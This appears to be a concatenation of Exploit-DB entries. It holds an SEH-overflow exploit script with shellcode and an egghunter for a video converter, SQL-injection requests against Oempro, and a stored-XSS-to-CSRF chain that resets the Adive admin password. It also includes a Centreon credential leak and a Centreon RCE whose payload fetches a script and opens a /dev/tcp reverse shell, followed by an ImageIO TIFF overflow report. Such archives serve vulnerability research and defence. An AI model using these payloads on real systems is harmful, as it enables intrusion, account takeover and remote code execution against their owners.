-p windows/exec CMD='calc' -e x86/alpha_upper --format python -v shellcode # x86/alpha_upper chosen with final size 447 # Payload size: 447 bytes ## msfvenom x86/alpha_uppers GetPC Routine ## # [!] Does not work because of the bad chars! # Manually replaced with a working version of GetPC for this exploit # 89E5 mov ebp, esp shellcode = b'\x54\x5D' # push esp # pop ebp # DBCD fcmovne st, st(5) shellcode += b'\x89\xCF' # mov edi, ecx # D975 F4 fstenv [ebp-C] shellcode += b'\x47\x47\x90' # inc edi # inc edi # nop # 5F pop edi shellcode += b'\x90' # nop shellcode += b"\x57\x59\x49" shellcode += b"\x49\x49\x49\x43\x43\x43\x43\x43\x43\x51\x5a" shellcode += b"\x56\x54\x58\x33\x30\x56\x58\x34\x41\x50\x30" shellcode += b"\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41" shellcode += b"\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42" shellcode += b"\x42\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a" shellcode += b"\x49\x4b\x4c\x5a\x48\x4d\x52\x55\x50\x55\x50" shellcode += b"\x33\x30\x43\x50\x4b\x39\x4b\x55\x46\x51\x59" shellcode += b"\x50\x42\x44\x4c\x4b\x30\x50\x36\x50\x4c\x4b" shellcode += b"\x56\x32\x34\x4c\x4c\x4b\x56\x32\x42\x34\x4c" shellcode += b"\x4b\x34\x32\x31\x38\x34\x4f\x4e\x57\x50\x4a" shellcode += b"\x37\x56\x30\x31\x4b\x4f\x4e\x4c\x47\x4c\x35" shellcode += b"\x31\x43\x4c\x34\x42\x56\x4c\x47\x50\x39\x51" shellcode += b"\x58\x4f\x34\x4d\x45\x51\x59\x57\x4a\x42\x4a" shellcode += b"\x52\x46\x32\x56\x37\x4c\x4b\x31\x42\x44\x50" shellcode += b"\x4c\x4b\x50\x4a\x47\x4c\x4c\x4b\x50\x4c\x42" shellcode += b"\x31\x33\x48\x4b\x53\x51\x58\x45\x51\x4e\x31" shellcode += b"\x30\x51\x4c\x4b\x31\x49\x51\x30\x55\x51\x59" shellcode += b"\x43\x4c\x4b\x30\x49\x42\x38\x4b\x53\x37\x4a" shellcode += b"\x57\x39\x4c\x4b\x47\x44\x4c\x4b\x53\x31\x59" shellcode += b"\x46\x46\x51\x4b\x4f\x4e\x4c\x39\x51\x38\x4f" shellcode += b"\x34\x4d\x35\x51\x4f\x37\x57\x48\x4d\x30\x53" shellcode += b"\x45\x4c\x36\x45\x53\x53\x4d\x4a\x58\x37\x4b" shellcode += b"\x43\x4d\x46\x44\x33\x45\x4a\x44\x56\x38\x4c" shellcode += b"\x4b\x36\x38\x47\x54\x45\x51\x38\x53\x32\x46" shellcode += b"\x4c\x4b\x44\x4c\x30\x4b\x4c\x4b\x50\x58\x45" shellcode += b"\x4c\x53\x31\x59\x43\x4c\x4b\x45\x54\x4c\x4b" shellcode += b"\x33\x31\x38\x50\x4d\x59\x57\x34\x57\x54\x36" shellcode += b"\x44\x31\x4b\x51\x4b\x33\x51\x36\x39\x31\x4a" shellcode += b"\x50\x51\x4b\x4f\x4d\x30\x51\x4f\x31\x4f\x50" shellcode += b"\x5a\x4c\x4b\x45\x42\x5a\x4b\x4c\x4d\x51\x4d" shellcode += b"\x52\x4a\x35\x51\x4c\x4d\x4c\x45\x48\x32\x35" shellcode += b"\x50\x43\x30\x33\x30\x46\x30\x43\x58\x46\x51" shellcode += b"\x4c\x4b\x42\x4f\x4d\x57\x4b\x4f\x59\x45\x4f" shellcode += b"\x4b\x5a\x50\x38\x35\x39\x32\x31\x46\x53\x58" shellcode += b"\x4e\x46\x5a\x35\x4f\x4d\x4d\x4d\x4b\x4f\x58" shellcode += b"\x55\x47\x4c\x35\x56\x43\x4c\x35\x5a\x4b\x30" shellcode += b"\x4b\x4b\x4d\x30\x42\x55\x44\x45\x4f\x4b\x37" shellcode += b"\x37\x45\x43\x54\x32\x32\x4f\x42\x4a\x55\x50" shellcode += b"\x36\x33\x4b\x4f\x58\x55\x45\x33\x55\x31\x32" shellcode += b"\x4c\x43\x53\x35\x50\x41\x41" # Stack EggHunter for fun & profit egg = 'BOKU' hunterOS = '\x41'*(2784-len(egg+egg+shellcode)) # After executing the code in nSEH, we are left with 88 bytes to create our Hunter hunter = '\x4C'*4 # dec esp * 4 / avoid sub bad char / topOfStack=GetPC hunter += '\x5B' # pop ebx / EBX=PC hunter += '\x80\x43\x29\x20' # add byte [ebx+41], 0x20 / 20+55=7F=jnz hunter += '\x80\x43\x33\x20' # add byte [ebx+51], 0x20 / 20+55=7F=jnz hunter += '\xB8\x42\x4F\x4B\x55' # mov eax,0x424f4b55 hunter += '\x54' # push esp hunter += '\x59' # pop ecx hunter += '\x90'*18 # nop fillers for jnz short -7 loop hunter += '\x49' # dec ecx hunter += '\x3B\x01' # cmp eax, [ecx] hunter += '\x55\xF7' # 75F7 = jnz short -7 / Have to avoid bad \xF- chars hunter += '\x51' # push ecx hunter += '\x5a' # pop edx hunter += '\x4a'*4 # dec edx * 4 / check if second egg matchs hunter += '\x3B\x02' # cmp eax, [edx] hunter += '\x55\xDF' # jnz short -31 / back to the loop - avoid bad chars hunter += '\x83\xc1\04' # add ecx, 0x4 / start of shellcode after eggs hunter += '\x31\xd2' # xor edx,edx hunter += '\x52' # push edx hunter += '\xC6\x44\x24\x02\x4B' # mov byte [esp+0x2],0x4b hunter += '\xC6\x44\x24\x01\x44' # mov byte [esp+0x1],0x44 hunter += '\xC6\x04\x24\x39' # mov byte [esp],0x39 # [ESP]=0x004b4439 : call ecx | startnull,asciiprint,ascii,alphanum,uppernum {PAGE_EXECUTE_READWRITE} [bsvideoconverter.exe] # ASLR: False, Rebase: False, SafeSEH: False, OS: False, v4.2.8.1 (C:\Program Files\Torrent 3GP Converter\bsvideoconverter.exe) hunter += '\xc3' # ret huntRmdr = '\x41'*(88-len(hunter)) nsehOS = '\x90'*(4500-len(egg+egg+shellcode+hunterOS+hunter+huntRmdr)) nSEH = '\x83\xC4\x04\xC3' # add esp,byte +0x4 # ret # 3-byte SEH overwrite using the truncating Null byte SEH = '\x0f\x47\x4c' # 0x004c470f : pop esi # pop ebx # ret [bsvideoconverter.exe] # ASLR: False, Rebase: False, SafeSEH: False {PAGE_EXECUTE_READWRITE} payload = egg+egg+shellcode+hunterOS+hunter+huntRmdr+nsehOS+nSEH+SEH try: f=open("crash.txt","w") print("[+] Creating %s bytes evil payload." %len(payload)) f.write(payload) f.close() print("[+] File created!") except: print("File cannot be created.")

# Exploit Title: Octeth Oempro 4.8 - 'CampaignID' SQL Injection # Date: 2020-01-27 # Exploit Author: Bruno de Barros Bulle (www.xlabs.com.br) # Vendor Homepage: www2.octeth.com # Version: Octeth Oempro v.4.7 and v.4.8 # Tested on: Oempro v.4.7 # CVE : CVE-2019-19740 An authenticated user can easily exploit this vulnerability. Octeth Oempro 4.7 and 4.8 allow SQL injection. The parameter CampaignID in Campaign.Get is vulnerable. # Error condition POST /api.php HTTP/1.1 Host: 127.0.0.1 command=Campaign.Get&CampaignID=2019'&responseformat=JSON # SQL Injection exploitation POST /api.php HTTP/1.1 Host: 127.0.0.1 command=Campaign.Get&CampaignID=2019 OR '1=1&responseformat=JSON

# Exploit Title: Adive Framework 2.0.8 - Cross-Site Request Forgery (Change Admin Password) # Exploit Author: Sarthak Saini # Date: 2020-01-18 # Vendor Link : https://www.adive.es/ # Software Link: https://github.com/ferdinandmartin/adive-php7 # Version: 2.0.8 # CVE:CVE-2020-7991 # Category: Webapps # Tested on: windows64bit / mozila firefox # # |--!> |---------------------------------------------------------------------------------- 1) Persistent Cross-site Scripting at user add page Description : The parameter 'userUsername=' is vulnerable to Stored Cross-site scripting Payload:- <script>alert(1)</script> POST /admin/user/add HTTP/1.1 Host: 192.168.2.5 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 62 Origin: http://192.168.2.5 DNT: 1 Connection: close Referer: http://192.168.2.5/admin/user/add Cookie: PHPSESSID=3rglrbjn0372tf97voajlfb1j4 Upgrade-Insecure-Requests: 1 userName=test&userUsername=<script>alert('xss')</script>&pass=test&cpass=test&permission=3 |---------------------------------------------------------------------------------- 2) account takeover - cross side request forgery (Change Admin Password) Description : attacker can craft a malicious javascript and attach it to the stored xss, when admin visits the /admin/user page the payload will trigger. -> Save the payload as exp.js -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==--==- function execute() { var nuri ="http://192.168.2.5/admin/config"; xhttp = new XMLHttpRequest(); xhttp.open("POST", nuri, true); xhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded"); xhttp.withCredentials = "true"; var body = ""; body += "\r\n\r\n"; body += "userName=Administrator&confPermissions=1&pass=hacked@123&cpass=hacked@123&invokeType=web"; xhttp.send(body); return true; } execute(); -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==--==- -> Start a server and host the exp.js. Send the exp.js file in the xss payload Payload:- <script src="http://192.168.2.5/exp.js"></script> POST /admin/user/add HTTP/1.1 Host: 192.168.2.5 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 143 Origin: http://192.168.2.5 DNT: 1 Connection: close Referer: http://192.168.2.5/admin/user/add Cookie: PHPSESSID=3rglrbjn0372tf97voajlfb1j4 Upgrade-Insecure-Requests: 1 userName=%3Cscript+src%3D%22http%3A%2F%2F192.168.2.5%2Fexp.js%22%3E%3C%2Fscript%3E&userUsername=test&pass=test&cpass=test&permission=3 -> As soon as admin will visit the page the payload will be triggered and the admin password will be changed to hacked@123 |-----------------------------------------EOF-----------------------------------------

# Exploit Title: Centreon 19.10.5 - Database Credentials Disclosure # Date: 2020-01-27 # Exploit Author: Fabien AUNAY, Omri Baso # Vendor Homepage: https://www.centreon.com/ # Software Link: https://github.com/centreon/centreon # Version: 19.10.5 # Tested on: CentOS 7 # CVE : - ########################################################################################################### Centreon 19.10.5 Database Credentials Disclosure Trusted by SMBs and Fortune 500 companies worldwide. An industry reference in IT Infrastructure monitoring for the enterprise. Counts 200,000+ ITOM users worldwide and an international community of software collaborators. Presence in Toronto and Luxembourg. Deployed in diverse sectors: - IT & telecommunication - Transportation - Government - Heath care - Retail - Utilities - Finance & Insurance - Aerospace & Defense - Manufacturing - etc. ########################################################################################################### POC: - Configuration / Pollers / Broker configuration -- Central-broker | Central-broker-master --- Output It is possible to discover the unencrypted password with the inspector. DB user centreon DB password ******** <input size="120" name="output[0][db_password]" type="password" value="ZVy892xx">

# Exploit Title: Centreon 19.10.5 - Remote Command Execution # Date: 2020-01-27 # Exploit Author: Fabien AUNAY, Omri BASO # Vendor Homepage: https://www.centreon.com/ # Software Link: https://github.com/centreon/centreon # Version: 19.10.5 # Tested on: CentOS 7 # CVE : - ########################################################################################################### Centreon 19.10.5 Remote Command Execution Resources Trusted by SMBs and Fortune 500 companies worldwide. An industry reference in IT Infrastructure monitoring for the enterprise. Counts 200,000+ ITOM users worldwide and an international community of software collaborators. Presence in Toronto and Luxembourg. Deployed in diverse sectors: - IT & telecommunication - Transportation - Government - Heath care - Retail - Utilities - Finance & Insurance - Aerospace & Defense - Manufacturing - etc. It is possible to call binaries not only in default $USER$ path by adding Poller's Resources. By adding two entries it is possible to trigger a download exec reverse shell. Note, your reverse shell is persistent because Centreon execute your payloads all 10 minutes by default. Steps: Objective 1 : Add Download Resource Objective 2 : Add Exec Resource Objective 3 : Create your both commands check Objective 4 : Create your services and link them with a host Restart the Central. ########################################################################################################### # Objective 1 : Add Download Resource - Configuration/Pollers/Resources - Problem: Illegal Object Name Characters : ~!$%^&*"|'<>?,()= Illegal Macro Output Characters : `~$^&"|'<> Maximum client side input size limit: 35 - Information: Read Centreon documentation: To install Centreon software from the repository, you should first install the centreon-release package, which will provide the repository file. Some may not have the wget package installed. If not perform the following : yum install wget Solution 1: Remove restriction in Configuration/Pollers/Engine configuration Solution 2: Modify input size inspector in client side <input> size="250" Solution 3: Mixed, use a custom payload -> wget -P /tmp/ 127.0.0.1:8080/x.sh # Objective 2 : Add Exec Resource - Configuration/Pollers/Resources - Problem: Illegal Object Name Characters : ~!$%^&*"|'<>?,()= Illegal Macro Output Characters : `~$^&"|'<> Maximum client side input size limit: 35 Solution: Use a custom payload -> bash /tmp/x.sh # Objective 3 : Create your both commands check with your resources $xxx$ without arguments # Objective 4 : Create your services and link them with a host POC: Payload x.sh : 0<&121-;exec 121<>/dev/tcp/127.0.0.1/1234;sh <&121 >&121 2>&121 python -m SimpleHTTPServer 8080 Serving HTTP on 0.0.0.0 port 8080 ... 127.0.0.1 - - [27/Jan/2020 22:13:27] "GET /x.sh HTTP/1.1" 200 - nc -lvnp 1234 Ncat: Version 7.50 Ncat: Listening on :::1234 Ncat: Listening on 0.0.0.0:1234 Ncat: Connection from 127.0.0.1. Ncat: Connection from 127.0.0.1:43128. id uid=993(centreon-engine) gid=990(centreon-engine) groups=990(centreon-engine),992(centreon-broker),993(nagios),994(centreon) sudo -l Matching Defaults entries for centreon-engine on centreon-lab: !visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin, env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS", env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES", env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY", secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin, !requiretty User centreon-engine may run the following commands on centreon-lab: (root) NOPASSWD: /sbin/service centreontrapd start (root) NOPASSWD: /sbin/service centreontrapd stop (root) NOPASSWD: /sbin/service centreontrapd restart (root) NOPASSWD: /sbin/service centreontrapd reload (root) NOPASSWD: /usr/sbin/service centreontrapd start (root) NOPASSWD: /usr/sbin/service centreontrapd stop (root) NOPASSWD: /usr/sbin/service centreontrapd restart (root) NOPASSWD: /usr/sbin/service centreontrapd reload (root) NOPASSWD: /sbin/service centengine start (root) NOPASSWD: /sbin/service centengine stop (root) NOPASSWD: /sbin/service centengine restart (root) NOPASSWD: /sbin/service centengine reload (root) NOPASSWD: /usr/sbin/service centengine start (root) NOPASSWD: /usr/sbin/service centengine stop (root) NOPASSWD: /usr/sbin/service centengine restart (root) NOPASSWD: /usr/sbin/service centengine reload (root) NOPASSWD: /bin/systemctl start centengine (root) NOPASSWD: /bin/systemctl stop centengine (root) NOPASSWD: /bin/systemctl restart centengine (root) NOPASSWD: /bin/systemctl reload centengine (root) NOPASSWD: /usr/bin/systemctl start centengine (root) NOPASSWD: /usr/bin/systemctl stop centengine (root) NOPASSWD: /usr/bin/systemctl restart centengine (root) NOPASSWD: /usr/bin/systemctl reload centengine (root) NOPASSWD: /sbin/service cbd start (root) NOPASSWD: /sbin/service cbd stop (root) NOPASSWD: /sbin/service cbd restart (root) NOPASSWD: /sbin/service cbd reload (root) NOPASSWD: /usr/sbin/service cbd start (root) NOPASSWD: /usr/sbin/service cbd stop (root) NOPASSWD: /usr/sbin/service cbd restart (root) NOPASSWD: /usr/sbin/service cbd reload (root) NOPASSWD: /bin/systemctl start cbd (root) NOPASSWD: /bin/systemctl stop cbd (root) NOPASSWD: /bin/systemctl restart cbd (root) NOPASSWD: /bin/systemctl reload cbd (root) NOPASSWD: /usr/bin/systemctl start cbd (root) NOPASSWD: /usr/bin/systemctl stop cbd (root) NOPASSWD: /usr/bin/systemctl restart cbd (root) NOPASSWD: /usr/bin/systemctl reload cbd

The attached tiff image causes a crash in ImageIO on the latest macOS and iOS. To reproduce the issue, the attached code (tester.m) can be used. I've attached another code snippet to reproduce the issue on iOS as well. With tester.m compiled with ASAN, processing the attached tiff image should crash with an access violation similar to the following: % ./tester fuzzed.tif AddressSanitizer:DEADLYSIGNAL ================================================================= ==70578==ERROR: AddressSanitizer: SEGV on unknown address 0x00010decf000 (pc 0x7fff3a588390 bp 0x7ffee8fbb6d0 sp 0x7ffee8fbb0e0 T0) ==70578==The signal is caused by a WRITE memory access. #0 0x7fff3a58838f in invocation function for block in TIFFReadPlugin::DecodeBlocks(IIOImageRead*, GlobalTIFFInfo*, ReadPluginData const&, TIFFPluginData const&, std::__1::vector<IIODecodeFrameParams, std::__1::allocator<IIODecodeFrame Params> >&) (ImageIO:x86_64h+0xab38f) #1 0x7fff6e8ca512 in _dispatch_client_callout2 (libdispatch.dylib:x86_64+0x3512) #2 0x7fff6e8dabcb in _dispatch_apply_serial (libdispatch.dylib:x86_64+0x13bcb) #3 0x7fff6e8ca4dd in _dispatch_client_callout (libdispatch.dylib:x86_64+0x34dd) #4 0x7fff6e8cde62 in _dispatch_sync_function_invoke (libdispatch.dylib:x86_64+0x6e62) #5 0x7fff6e8daaf4 in dispatch_apply_f (libdispatch.dylib:x86_64+0x13af4) #6 0x7fff3a587028 in TIFFReadPlugin::CallDecodeBlocks(IIOImageRead*, GlobalTIFFInfo*, ReadPluginData const&, TIFFPluginData const&, IIORequest, std::__1::vector<IIODecodeFrameParams, std::__1::allocator<IIODecodeFrameParams> >&) (Imag eIO:x86_64h+0xaa028) #7 0x7fff3a513f29 in TIFFReadPlugin::copyImageBlockSet(InfoRec*, CGImageProvider*, CGRect, CGSize, __CFDictionary const*) (ImageIO:x86_64h+0x36f29) #8 0x7fff3a4f7a1d in IIO_Reader::CopyImageBlockSetProc(void*, CGImageProvider*, CGRect, CGSize, __CFDictionary const*) (ImageIO:x86_64h+0x1aa1d) #9 0x7fff3a4f6dfe in IIOImageProviderInfo::CopyImageBlockSetWithOptions(void*, CGImageProvider*, CGRect, CGSize, __CFDictionary const*) (ImageIO:x86_64h+0x19dfe) #10 0x7fff37a9eb13 in imageProvider_retain_data (CoreGraphics:x86_64h+0x3cb13) #11 0x7fff37a9ea8f in CGDataProviderRetainData (CoreGraphics:x86_64h+0x3ca8f) #12 0x7fff37a9eab1 in provider_for_destination_retain_data (CoreGraphics:x86_64h+0x3cab1) #13 0x7fff37a9ea8f in CGDataProviderRetainData (CoreGraphics:x86_64h+0x3ca8f) #14 0x7fff37a9e949 in CGAccessSessionCreate (CoreGraphics:x86_64h+0x3c949) #15 0x7fff37a9cb8c in img_data_lock (CoreGraphics:x86_64h+0x3ab8c) #16 0x7fff37a9839a in CGSImageDataLock (CoreGraphics:x86_64h+0x3639a) #17 0x7fff37a97d92 in RIPImageDataInitializeShared (CoreGraphics:x86_64h+0x35d92) #18 0x7fff37a97951 in RIPImageCacheGetRetained (CoreGraphics:x86_64h+0x35951) #19 0x7fff37a97426 in ripc_AcquireRIPImageData (CoreGraphics:x86_64h+0x35426) #20 0x7fff37a966eb in ripc_DrawImage (CoreGraphics:x86_64h+0x346eb) #21 0x7fff37a95a1f in CGContextDrawImageWithOptions (CoreGraphics:x86_64h+0x33a1f) #22 0x106c42aab in main (tester:x86_64+0x100001aab) #23 0x7fff6e91a404 in start (libdyld.dylib:x86_64+0x11404) ==70578==Register values: rax = 0xffffffffffffff01 rbx = 0x0000800080008080 rcx = 0x0000000000000080 rdx = 0x0000000000000008 rdi = 0x0000000000000000 rsi = 0x0000000000000000 rbp = 0x00007ffee8fbb6d0 rsp = 0x00007ffee8fbb0e0 r8 = 0x0000632000003002 r9 = 0x00000000000000ff r10 = 0x0000800080008080 r11 = 0xfffffffffffffff0 r12 = 0x0000000000000001 r13 = 0x000000010decf000 r14 = 0x0000000000000008 r15 = 0x0000000000000000 AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV (ImageIO:x86_64h+0xab38f) in invocation function for block in TIFFReadPlugin::DecodeBlocks(IIOImageRead*, GlobalTIFFInfo*, ReadPluginData const&, TIFFPluginData const&, std::__1::vector<IIODecodeFrameParams , std::__1::allocator<IIODecodeFrameParams> >&) ==70578==ABORTING The overflow happens out of an mmap region as the memory buffer is allocated using ImageIO_Malloc, which is itself mostly a thin wrapper around mmap. The crashing image was found through fuzzing and both the crashing as well as the original image are attached. The relevant byte change removes the BitsPerSample entry (original value is 8) from the TIFF file, in which case a default value of 1 will be used. As the SamplesPerPixel entry is still 3, the image will contain 3 bits per pixel, one for the red, one for the green, and one for the blue component. ImageIO will then allocate width*height*3 bytes of memory (for a RBG bitmap) using ImageIO_Malloc, then call TIFFReadPlugin::DecodeBlocks to write the image data into the buffer. Next, ImageIO uses the tile-oriented TIFF api [1] to read out a tile of the image in its current encoding (3 bits per pixel). The default tile size seems to be 0x100 x 0x100 and so the entire image (which is 143 x 190 pixels large) fits into one tile. Since there are three bits per pixel, the tile has a total of 0x100*0x100*3/8 = 0x6000 bytes, which is what TIFFReadTile returns. Finally, it appears that ImageIO then uses the returned size (0x6000) to decode the image instead of the correct image size (143 x 190). As such, it writes 0x6000*8 bytes (since the output format uses 8 bits per component, not 1) to the output buffer, or about 2.4 times the allocated size. The program then crashes with a memory violation. Since the buffer is already allocated using mmap, adding a guard page after it would likely prevent this and similar bugs from being exploitable in the future. The attached archive contains the original image and the mutated one causing the crash. It also contains code to reproduce the issue on macOS and iOS. Finally, it contains a python script to change the byte in question in the original file to remove the BitsPerSample entry and thus trigger the issue. Proof of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47970.zip